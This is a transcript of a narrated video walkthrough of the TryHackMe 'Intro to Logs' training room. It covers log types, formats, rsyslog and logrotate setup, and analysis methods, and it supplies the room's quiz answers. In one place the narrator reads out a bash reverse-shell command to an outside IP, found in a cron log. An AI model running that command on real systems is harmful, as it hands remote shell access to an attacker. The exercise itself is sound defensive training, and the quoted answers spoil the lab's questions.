Hello and welcome everyone to another video. So I'm really excited to start this video and to discuss about what I'm going to discuss and what I'm going to do right now. So in front of you, as you can see, there is an intro to logs, right? So this is a Tryhackme room, which I'm trying to do, and I am on the 3 days of streak as well, as you can see, right? But this particular room is a pathway in between the pathway to SOC level 2. So let's jump into it and look at the various things that this is going to teach us, right? So first of all, this room is about the fundamentals of logging and data sources, collection methods, right? And I have already done the introduction in which it says that the logs serve as invaluable record of past events and providing essential insights to address these questions. By preserving an archive of historical activity, we can bolster our security posture and protect our digital asset more effectively, right? But I want to just jump into the task 2, in which things become more practical, and we will enjoy it while doing this. So I just started this virtual machine over here. Now I'm gonna go to read this first one. In the heart of data logs, right? That is the heading. So as just as physical trees ring reveal its life story, indicating good ears with thick curls and challenging one with thin, a digital log provides a historical record for of system activity. Both embody a fundamental principle of growth over time and serve as a living record in their respective domain, physical and digital. In the digital world, every interaction with the computer system, from authentication attempts, granting authorization, accessing a file, and connecting to a network to encountering a system error, will always leave a digital footprint in the form of logs. Now, logs are a record of events within a system. These records provide a detailed account of what system has been doing, capturing a wide range of events such as user login, file access, system error, network connection, change to data systems and configuration. While the specific detail may differ based on the type of logs, a log entry usually include the following information. First is a timestamp of when an event was logged, and then the name of the system or the application that generated the log entry, the type of the event that occurred, additional details about the event, such as user who initiated the event, or device IP address that generated the event, right? So this information typically stored in a log file, which contains aggregated entries of what occurred at a given time on a system. Now, however, since digital interaction are continuous and fast-paced, the log file size may exponentially grow, and depending on activity logged on a system. The true power of log, contextual correlation. A single log entry may seem insignificant on its own, but when log data is aggregated, analyzed, and cross-referenced with other sources of information, it becomes a potent investigation tool. Logs can answer critical questions about an event, such as what happened, when did it happen, where did it happen, who is responsible, were their actions successful, were their actions successful, and what was the result of their actions, right? So the following hypothetical scenario can illustrate this aspect. Suppose a student allegedly accessed inappropriate content on a university network. By reviewing the log, a system administrator could answer the following answer: what happened? An adversary was confirmed to have accessed Swift Spend Financial GitLab instance. When did it happen? Access started at 22:10 on Wednesday, September 8th, 2023. Where did it happen? The event originated from this IP with the VPN. This who is responsible? Upon examining the network log, it was observed that the device identified user this with Mozilla web browser using this operating system and was allocated IP address, this one, right? So were they successful? Yes, since the API key was found to be publicly exposed on the GitLab instance. Moreover, the web proxy logs confirmed that the adversary device reached GitLab Swift Spend.finance and maintained access through their uploaded web shell. What the result of their action? The adversary achieved remote code execution on GitLab.swiftspend.finance and performed post-exploitation activities. Now, the example above emphasizes how logs are instrumental in piecing together a complete picture of an event, thereby enhancing our understanding and ability to respond. Now, we will answer the below question. So, what is the name of your colleague who left a note on your desktop? So, for that, I'll just open this. So, it says, "Hey, Damien, I figured you remote into this web server after all this. I wanted to give you some additional context about the unusual activity they reported. The server is public facing. Maintain. You could look at these. But I suggest looking. Unfortunately, this server is not managed frequently. We have yet to configure the log forwarding to SIM2 with RSS in the config, so you might need to collect the logs manually. You can check the log rotate configuration to the server. This and component of our GitLab instance. If needed, I'm still coordinating with the SecOp to get more specific information about the. Cheers, and I hope this helped, Perry." So I think the answer to this is Perry. Great. And what is the full path of the suggested log file for initial investigation? I think it suggests here, but I suggest looking into this log file and searching for the suspicious web browser first activity first, right? So I'll just copy this and paste it here. Great. Next, log types. Specific log types can offer a unique perspective on system operation, performance, and security. While there are various log types, we will focus on the most common ones that cover approximately 80% of the typical use cases. Below is a list of some of the most common log types. First is application log. Messages about specific applications, including status, errors, warning, etc. Audit logs, activity related to operational procedure crucial for regulatory compliances. Then security logs, security events such as logins, permissions, changes, firewall activity, etc. Server logs, various logs a server generate, including system, event, error, access log. System log, kernel activity, system error, boot, sequence and hardware status. Network log, network traffic connection, other network related activity. Database log, activity within a database such as query and updates. Web server logs, requests processed by a web server including URL, response scores, etc. Now, understanding the various log type, format, and standard is critical for practical log analysis. It enables an analyst to effectively parse, interpret, and gain insight from the log data, facilitating troubleshooting, performance optimization, incident response, and threat hunting. Now, log format. A log format defines the structure and organization of data within a log file. It specifies how data is encoded and how each entry is delimited and what fields are included in each row. These formats can vary widely and may fall into three main categories: semi-structured, structured, and unstructured. We will explore all these categories and illustrate their usage with example. So first is semi-structured logs. These logs may contain structured and unstructured data with predictable component accommodating free-form text. Example includes syslog format, a widely adopted logging protocol for system and network logs. Now we also have window event log, proprietary window log for Windows system here. Then comes the structured log. Following a strict and standardized format, these logs are conducive to parsing and analysis. Typically, structured log format include field delimited format, comma separated values such as here, and tab separated values. TSV are format often use tabular data. Now, example would be, first of all, example of a log file utilizing CSV format is this one, and JavaScript objection notation JSON, known for its readability and compatibility with modern programming language, is this one. So it is properly formatted, having those commas, quotation marks, so it becomes easy to read, right? And next is W3C extended log format, ELF, defined by the Worldwide Web Consortium, W3C, customizable for web server logging. It is typically used by Microsoft Internet Information Service, IIS, web server, and the example would be this one. So it tells here version, then field, date, time, CIP username, IPS port, method, status, and then we have date, time zone, IP address, port number. And then comes the extensible markup language, flexible and customizable for creating standardized logging format. This comes with .xml. Now, the third option is unstructured logs, comprising free-form text. These logs can be rich in context but may pose challenge in systematic parsing. Example include NCSA log format, common log format, a standardized web server log format for client request. It is typically used by Apache HTTP server by default, right? So it says HTTP here, and we have the IP address, then the date, and clf.log file. Then comes the NCSA combined format, an extension of CLF, that is common log format, adding field like referrer and user agent. It is typically used by Nginx HTTP server by default. As you can see, we have this extra information. Up to this, it is same as the CLF, but after this, we have the extra information of the referrer and the user agent, right? And then custom defined format can be crafted to meet specific application or use cases. These formats provide flexibility but may necessitate specialized parsing tools for effective interpretation and analysis. Now, log standards. Log standard is a set of guidelines or specifications that define how logs should be generated, transmitted, and stored. Log standard may specify the use of particular log format, but they also cover other aspects of logging, such as what events should be logged, how logs should be transmitted securely, and how long logs should be retained. Example of log standards include CEE, Common Event Expression. This standard, developed by MITRE, provides a common structure for log data, making it easier to generate, transmit, store, and analyze logs. OWASP Logging Cheat Sheet, a guide for developers on building application logging mechanism, especially related to security logging. Syslog protocol. Syslog is a standard for message logging, allowing separation of the software that generate messages from the system that stored them and the software that reports the analyzes them and analyzes them. Right now, NIST Special Publication 892. This publication guide computer security log management. Azure Monitor Logs guideline for logging, log monitoring on Azure, Google Cloud Logging, Oracle Cloud Infrastructure Logging, Virginia Tech, the standard for information technology logging. Right now, the question is based on the list of log type in this task. What log type is used by the log file specified in the note from task 2? So based on the list of log type in this task, what log type is used? So for that, we have to go to the task 2. And as you may remember, so in this we have access.log file, right? Now, all right, after searching for 2 to 3 minutes, I came to know that it says in here, and searching for suspicious web browser activity first. And after looking at the log type, I think this is the answer, web server logs, because it was related to the web server logs. Yes. And here it also says, I figured you did remote into this web server after the call with SACOP regarding ticket. And then it says here, you can access these logs and search for suspicious web browser first activity. So this comes up to the web server log. Also, these dash hinted in the answer helped me to guess this answer. All right. And next question is based on the list of log format in this task. What log format is used by the log file specified in the note from task 2? What log format is used? Okay. So I assume that this is the .log file, right? And we have log.log file in unstructured. Okay. So answer to this is structured log, right? But I want to give the reason behind the answer. Okay, so for that, we will go specifically to this file. Okay, so this is the file of the log, access.log file, right? And of course, it is well structured. It is in the quotation marks. Then we have semicolons and the commas to separate the different information. Whereas in unstructured, we don't have such things, right? But I cannot like tell the much difference between both. Still, I will, I still need to learn, but I'll go with the structured. Ooh, okay, so the answer is combined. That's why it's not the fully structured, but this resonates with the NSA combined log format, which is combined. So there is an adding field at the last of the each event. There is the field which says referrer and the user agent, right? And also it typically use this. This is the main differentiator because in the path it says that it is the nginx file, and here it says it typically used by nginx HTTP server by default. Okay, so it took some time, but finally now it makes much more sense, right? And now task 4, it says log collection. Now log collection is an essential component of log analysis, involving the aggregation of log from diverse sources such as server, network devices, software, and databases, right? For logs to effectively present a chronicle sequence of events, it's crucial to maintain the system time accuracy during logging. Utilizing the network time protocol (NTP) is a method to achieve synchronization and ensure the integrity of the timeline stored in the log. Now, as this is a foundational step to ensuring that a security analyst would have a comprehensive data set to review, the following is a simple step-by-step process to achieving this, bearing in mind the need to prioritize the collection based on significant information. Identity source. List all potential log sources such as servers, databases, application, and network devices. Choose a log collector. Opt for a suitable log collector or a software that aligns with your infrastructure. Third is configure collection parameters. Ensure that time synchronization is enabled through NTP, which is Network Time Protocol, to maintain accurate timelines. Adjust settings to determine which event to log that at what intervals, and prioritize based on importance. Now, test collections. Once configured, run a test to ensure logs are appropriately collected from all sources. Right? Now, important. Please be aware that the NTP-based time synchronization may not be possible to replicate with the VM since it has no internet connectivity. However, when performing this in practice using this to find NTP best. Okay. Synchronization can be performed on Linux-based or manually initiated by executing this. Mhm. Okay. Let us try to run this command here. Wait. Update tool.ntp.org. Oh, wow, it says here the exact date and time. But it says permission denied. Okay, let us do a sudo. What is the password? Okay, this is not allowed. Fine. Next comes the log management. Efficient log management ensures that every gathered log is stored securely, organized systematically, and is ready for swift retrieval. A hybrid approach can provide a balanced solution by hoarding all log files and selectively trimming. Once you have collated your logs, effective management of them is paramount. These steps can be followed to achieve storage, decide on a secure storage solution considering factors like retention period, accessibility, organization, classify log based on source type, other criteria for easy access later, regularly backup your logs to prevent data loss, periodically review logs to ensure they are correctly stored and categorized. Now, what is log centralization? So, centralization is a pivotal for swift log access in-depth analysis and rapid incident response. A unified system allow for efficient log management with tools that offer real-time detection, automatic notification, and seamless integration with incident management system. Centralizing your log can significantly streamline access and analysis. Here's a simple process for achieving it. Choose a centralized system. Opt for a system that consolidates log from all sources, such as Elastic or Splunk. Integrate sources, connect all your log sources to the centralized system, and then set up monitoring. Utilize tools that provide real-time monitoring and alerts for specific events. Then integration with incident management. Ensure that your centralized system can integrate seamlessly with any incident management tool or protocol you have. Now, practical activity, log collection with RSys log. So this activity aims to introduce RSys and demonstrate how it can enhance the centralization and management of logs. As part of the collection process, we will configure RSys to log all SSH and D messages to specific file, such as var log web server to RSys sshd.log. So this step below can be followed to achieve this. So now it says open a terminal. I already did, and ensure RSys is installed. You can check if RSys is installed by running sudo systemctl status RSys. So it says here active running since this, and main process ID, memory. Okay, next is create a configuration file. So use a text editor to create the following configuration file. I will open a text editor. Or it's better to do through terminal itself, right? So let me run this command directly. Maybe that would be helpful. I'm just going to close this terminal. Going to open a new one. Okay, so now first command is going to be gedit /etc. Okay, so it opened the text editor, right? So I have saved this and close this. I will close the file. Let's go to the terminal. Now it says restart the RSys log. So I have typed the command, press enter. Okay. Next is verify the configuration. You can verify the configuration work by initiating an SSH connection to the local host via SSH localhost. We don't have it yet, but it says we can check it log file after a minute or two. So I'm going to wait. We also want to go to the specific folder. Okay, so let's cd to var slash log slash. Okay, here. So we have this file here, which says rsyslog sshd log, and it is created today, just a few minutes back. Great. So next we will answer these questions. That is, after configuring RSys log for SSHD, what username repeatedly appear in the SSHD log at var log web serve to RSys sshd.log indicating failed login. Okay, so for that I will do cat RSys log sshd. What username repeatedly appear in SSH logs indicating failed login attempt? Invalid user Stan Seaman. Invalid user Stan Seaman. So let's try this. Woohoo. Next is, what is the IP address of SIEM O2 based on the RSys configuration file? This, which is used to monitor cron messages. Perfect. Press Control C to ls. Okay, and it requires us to open the same SSHD. Oh, sorry. It requires us to open the cron.config file. So let's go back. Go to etc. Go to, I am following this path, right? Then we need to cat 99. Okay. So IP address is here. So the IP address was 10.101. Great. Now based on the generated logs in this, what command is being executed by the root user? So now we will again go back to the this path mentioned in the question. Okay. I will open the file mentioned here, which is this. Okay. So let me open doing cat. So we have to find the command that is being executed by the root user. Wait. Usually when we follow this file, we have the command here that I think is going to be the answer for this, which is this one. No, it's slash wow bin bash I great no space greater than and slash no wait I am slash. Sorry, I just started from here while the command starts from here. Okay, that's why it is not perfectly aligning with the format, right? So bin bash space dash c, you have quotation mark, then slash bin bash greater than and slash dev slash tcp 34.253.159.159 slash triple nine nine zero greater than and 1. Okay. Okay, so next task 5 is log storage. Logs can be stored in various locations, such as local system that generate them, a centralized repository, or a cloud-based storage. The choice of storage location typically depend on multiple factors. First is security requirement, ensuring that logs are stored in compliance with the organizational or regulatory security protocols. Then accessibility needs, how quickly and by whom the logs need to be accessed, and can influence the choice of storage. Next is storage capacity. The volume of logs generated may require significant storage space, influencing the choice of storage solution. And then cost consideration. The budget for log storage may dictate the choice between the cloud-based or local solutions. Compliance regulations, specific industry regulations governing log storage can affect the choice of storage. Retention policy, the required retention time and ease of retrieval can affect the decision-making process. Okay. Now, disaster recovery plan, ensuring the availability of logs even in the system failure. Log retentions. It is vital to recognize that the log storage is not infinite. There are a reasonable, or therefore a reasonable balance between retaining logs for potential future needs and storage cost is necessary. Understanding the concept of hot, warm, and cold storage can aid in this decision making. So hot storage logs are from past 3 to 6 months that are most accessible. Query speed should be near real time, depending on the complexity of the query, right? And then warm storage from 6 to 2 years, acting as a data lake, easily accessible but not immediate as hot storage. Then cold storage, archived or compressed logs from 2 to 5 years. These logs are not easily accessible and are usually used to retroactive analysis or scoping purpose. Now, log deletion. So log deletion must be performed carefully to above removing logs that could still be of value. The backup of log files, especially crucial one, is necessary before deletion. It is essential to have a well-defined deletion policy to ensure compliance with data protection laws and regulation. Log deletion helps to maintain a manageable size of log for analysis, comply with privacy regulations such as GDPR, which require unnecessary data to be deleted. Keep storage cost in balance. Now, best practices for log storage retention and deletion. Determine the storage retention and deletion policy based on the both business need and legal requirement. Regularly review and update the guideline per changing condition and regulations. Automate the storage retention deletion process to ensure consistency and avoid human error. Now, encrypt sensitive logs to protect the data. Regular backup should be made, especially before deletions. Here comes the another practical. In this activity, we aim to introduce log rotate, a tool that can automate log file rotation, compression, and management, ensuring that log files are handled systematically. It allows automatic rotation, compression, and removal of log file. Okay, now we are going to create another configuration file. After hitting the enter, I'm waiting for the file to be configured. Okay, next we have to define the log settings, which is this. Okay, saving and closing the configuration file, and then let's run this command. Okay, now based on the log rotate configuration, this file, how many version of all compressed log file copies will be kept? I think it must be mentioned in the command here. So maybe 30. No, that is the rotate policy. So that is maybe the 30 days. Okay, sir. It didn't mention in the command, or I couldn't locate it. Okay, what is the log rotation frequency? You know what? Wait. I will open this file using cat and then we will look into the file. After opening this file, I think it's a bit different file, so it must be 24. Okay, rotate after 24 files. So it is not the day, but after 24 files, the another file will be kept. So it will keep the last 24 version of the file. And next question asks about what is the log rotation frequency? It is hourly. Great. Now next is hand-on exercise, log analysis process tools and techniques. So logs are more than mere record of historical events. They can serve as a guiding compass. They are invaluable resource that, when skillfully leveraged, can enhance system diagnostic, cybersecurity, and regulatory compliance efforts. Their role in keeping a record of historical activity for a system or application is crucial. So log analysis process. Now, log analysis involves parsing, normalization, sorting, classification, enrichment, correlation, visualization, and reporting. It can be done through various tools and techniques, arranging more complex systems like Splunk, ELK, to ad hoc method ranging from default command line tools to open source. Okay, so data source are the system or application configured to log system events or user activities. Parsing is breaking down the log data into more manageable and understandable components. Normalization is the standardizing past data. So it involves bringing the various log data into a standard format, making comparing and analyzing data from different sources easier. So it is imperative in environment with multiple system applications. Sorting is a vital aspect of log analysis as it allows more efficient data retrieval and identification of patterns. Logs can be sorted by time, source, event type, severity, and any other parameters present in the data. Proper sorting is critical in identifying trends and anomalies that signal operational issue or security incident. Then classification involves assigning category to the log based on their characteristics. By classifying logs, you can quickly filter and focus on those logs that matter most to your analysis. For instance, classification can be based on the severity level, event type, or source. Automated classification used machine learning can significantly enhance this process, helping to identify potential issue or threat that could be overlooked. Enrichment. Log enrichment add text to the logs to make them more meaningful and easier to analyze. It could involve adding information like geographical data, user detail, threat intelligence, or even data from other sources that can provide a complete picture of the environment. Enrichment make logs more valuable, enabling analysts to make better decisions and more accurately respond to incident like classification. Log enrichment can be automated using machine learning, reducing time, effort required for log analysis. Now, correlation. Correlation involves linking related records and identifying connection between log entries. This process helps detect patterns and trends, making understanding complex relationship between various log events easier. Correlation is a critical in determining security threat or system performance, showing that might remain unnoticed. Visualization. So visualization represent log data in graphical format like chart, graph, or heat maps. Visualizing presenting data makes recognizing pattern trends and anomalies easier. So visualization tools provide an intuitive way to interpret large volume of log data, making complex information more accessible and understandable. Finally, reporting. Reporting summarizes log data into structured format to provide insights, support decision making, or meet compliance requirement. Effective reporting includes creating clear and concise log data, summarize catering to stakeholder needs such as management, security teams, auditors. Regular report can be vital in monitoring system health. Now, some of the log analysis tool. SIEM, security information and event management tools such as Splunk, Elasticsearch can be used for complex log analysis tasks. However, in the scenario where immediate data analysis is needed, such as during incident response, Linux-based system can employ default tools like cat, grep, set, sort, unique, and awk, along with SHA-256 or hashing log files, right? For hashing log files. Now, Windows-based system can utilize easy tools and default CMD that get file hash for similar purpose. These tools enable rapid parsing and analysis which suit this situation. Now, additionally, proper acquisition should be observed by taking log file hash during collection to ensure its admissibility in a court of law. Therefore, it is imperative not only to log events but also to ensure integrity, that they are analyzed and any lesson obtained from logs be learned, as the safety and efficiency of an organization can depend on them. Now, log analysis technique. Log analysis technique are method or practices used to interpret and drive insights from log data. So these techniques can range from simple, complex, and are vital to identifying patterns, anomalies, critical insights. Here are some of the common techniques. Pattern recognition. So this involves identifying a recurring sequence or trends in log data. It can detect regular system behavior or identifying unusual activity that may indicate a security threat. Anomaly detection. Anomaly detection focuses on identifying data points that deviate from the expected patterns. It is crucial to spot potential issue or malicious activity early on. Now, correlation analysis. Correlating significant log entry help understand the relation between various events. It can reveal causation and dependencies between system component and is vital in root cause analysis, right? Timeline analysis, machine learning and AI, visualization, statistical analysis. Now we have this practical activity as well, so I will quickly skip all this reading and come to working with log. Practical application. Working with log is a complex task, require both comprehension and manipulation of data. This tutorial covers two scenarios. First is handling unparsed raw log file, accessed directly via an open source log viewer tool. This method allows immediate analysis without pre-processing, which is ideal for quick inspection or preserving the original format. The second scenario focuses on creating a past consolidated log file using Unix tool like cat, grep, set, sort, unique, awk. Right? It involves merging, filtering, formatting log to create standardized file accessible through the log viewer tool. Consolidated file offer a clear and efficient view of data, aiding in identifying patterns and issues. These approaches highlight the flexibility and significance of log analysis in system diagnostic and cybersecurity. Whether using raw or parsed log, the ability to compile, view, and analyze data is vital for an organization's safety and efficiency. Unparsed raw log file. When dealing with raw log file, you can access them directly through the log viewer tool by specifying the path in the URL. Paste this URL into your browser to view unparsed log file using log viewer tool. So after pasting this URL, we can see the logs, and according to this, we are looking directly through the log viewer tool by specifying the path and the URL. Right now, we will move to the parsed and consolidated log files. To create a parsed and consolidated log files, you can use combination of these tools, and now use awk and set to normalize the log entry for the desired format. For this example, we'll sort by date and time. So here they have used this command to normalize according to the date and time. I'm just going to copy this first command and run it. Okay. Okay. This one is the last and the longest. Great. Now we are not going to use this optional command. Then use sort to sort all the log entries, of course. To remove duplicate entries, we are going to use unique command. Great. We can access this log using this command. Great. So upon accessing the log viewer URL on for unparsed raw log files, what error does var log web server? This shows when selecting different filters. What is the process of standardizing parsed data into the more easily readable and queryable format? Maybe visualization? No. more easily readable and queryable format. Okay, queryable as well. Hmm. Correlation. No, sir. Normalization. What is the process of consolidating normalized log to enhance the analysis of activities related to a specific IP address? So this would go to, it can be classification because we are categorizing the logs based upon their characteristics. Now IP address can be one of the characteristics. Maybe enrichment. Okay. So enrichment says here that log enrichment add context to log to add them more meaningful and easier to analyze. It could involve adding information like geographical data, user detail, threat intelligence, or even data from other sources that can provide a complete picture of the event. Enrichment makes logs more valuable, enabling analysts to make better decisions and more accurately response to incident. Like classification, log enrichment can be automated using this. Okay. Now we will left with this question: upon accessing the log viewer URL for unparsed raw log data, a log file, what error does this file shows when selecting different filters? It doesn't show me any error. Alt record filtered. I'm gonna use the hint for this. Click on the drop down button beside add filter. I did that, sir. It shows no error. Maybe the file I'm trying to access is the wrong one. Sorry, my bad. I am accessing the parsed log file, right? So unparsed is this one. Okay, let me try this one. Now try to add filter. Select date filter. Applying filter. So we are waiting for the error. No record to display. It says no date field. My God. Finally, congratulations, you have completed the intro to log room. Wow, that was intro. In the summary, we are able to learn and perform the following: the significance of log as record of the past activities essential to pinpointing and tackling threats, delve into an area of logs creation techniques and the method for gathering them from diverse systems, review the result from analysis log in the realms of detection, engineering, and incident handling, acquiring practical skill in identifying and countering adversaries via log analysis. Okay, if you enjoyed this room, continue learning. And we have EDR solutions, intrusion, IDPS rooms, SIEM room. First of all, let me complete this. And so reason behind making this video is to get you through and walk me through as well to the room I was doing and learned something meaningful. And there was a ton of information in this room that needs to be revised. But I hope if you're watching this video to the end, that it brings some value to you. I know that I have to learn a lot of things as well, but I tried it for the first time, and I will keep building on this knowledge. And as I will continue to build on this, I will get better, and will try to help you in a more sensible and more acceptable way that makes learning easy and makes you and everyone happy. That's it. So thank you for joining in this video. This is a really long video. It took me almost 2 hours, more than 2 hours to complete this room. However, I did enjoy this. So see you in the next one. Thank you.